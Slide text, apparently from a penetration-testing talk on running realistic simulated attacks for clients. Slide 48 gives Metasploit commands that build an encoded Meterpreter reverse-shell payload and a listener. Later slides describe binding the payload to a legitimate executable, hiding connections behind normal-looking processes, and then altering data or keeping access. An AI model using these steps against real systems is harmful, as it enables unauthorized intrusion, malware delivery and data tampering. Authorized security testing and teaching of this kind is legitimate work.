  • 31. IR Not all companies have IR teams How long does it take for the attackers trail to be found?
  • 32. Knowing you have been compromised = good When and how long for = better
  • 33. Reporting When it comes to the report attack them with simulated examples - examples you could recreate. Could you kill someone? Can you steal money? Can you change / recreate their product?
  • 34. Report cont. Give a time window / speak to only one person Document everything you do Ask them what they saw you do Compare
  • 35. Did they know? Did they know you were attacking them If so did they try to stop you? If not why not!
  • 36.
  • 37. Noise Levels Low - Ninja Hacking Skillz Medium - Make a few mistakes that should be detected High - Scan them to hell and back
  • 38. Graded Levels Level 1 - 5 Starting at Script Kiddies to Criminal
  • 39. What are we doing! Attacking systems with real results instead of just giving information they don’t care about.
  • 40. Methods Low hanging fruit are the first checkpoints Processes, connections, EventLog and in some case memory dumps
  • 41. Processes Time of creation Parent PID Owner Command Line
  • 42. Hide! Hide your connections SVCHOST.exe looks normal if connecting to high ports Firefox, Dropbox, AV 80 and 443
  • 43. Example So what are we actually talking about? How can we go about simulating an attack like what we have just spoken about?
  • 44. Ask and you shall receive Brief Discuss options for testing What is important to them?
  • 45. Seek and you will find What was important to them? Are they any exploits / 0-days for that piece of software?
  • 46. Knock and the door will be opened Simply and easily do not give up There is always going to be some avenue of attack for this client they may just not know about it Look at the following example
  • 47. Attacking Layer 8 Idiots in the company are your first point of call. Is the CEO an idiot? Skype is important to them - attack them with what is important!
  • 48. Attacking Layer 8 cont. ./msfpayload windows/meterpreter/reverse_tcp LHOST = x.x.x.x R | ./msfencode -e x86/ shikata_ga_nai -c 5 -t exe -o payload.exe ./msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST x.x.x.x exploit
  • 49. Attacking Layer 8 cont. Using IExpress you can bind a primary .exe. and your payload together Settings available in IExpress Running that evil .exe (BANG) reverse shell!
  • 50. Do not leave it there! What did I say at the beginning? Once you have shell do something with it so that it actually means something to them Delete data / change data / get addresses / create ways to stay there!
  • 51. But WAIT!!! POLITICS! You cannot just delete data without permission! Make sure you find out what you can do!
  • 52. If you can delete... You most likely can add
  • 55. This?
  • 58. This?
  • 59. WHAT IS ALL THIS! By simulating theses attacks the way I am talking about the client can then see exactly what they would need to do if it was a real attack!
  • 60. Future @sponex and I are creating a website about this and some guides that link to some good methodologies out there.
  • 61. Summary Attack them, don’t pussy foot around! Find out what they care about. Make them realise how hard it would be to fix.
  • 62. :~$ whoami Director of upSploit Limited Soon to be Web Application Security Consultant for Trustwave British Student Podcaster
  • 63. Questions thomas@tmacuk.co.uk www.tmacuk.co.uk / @tmacuk www.upsploit.com / @upsploit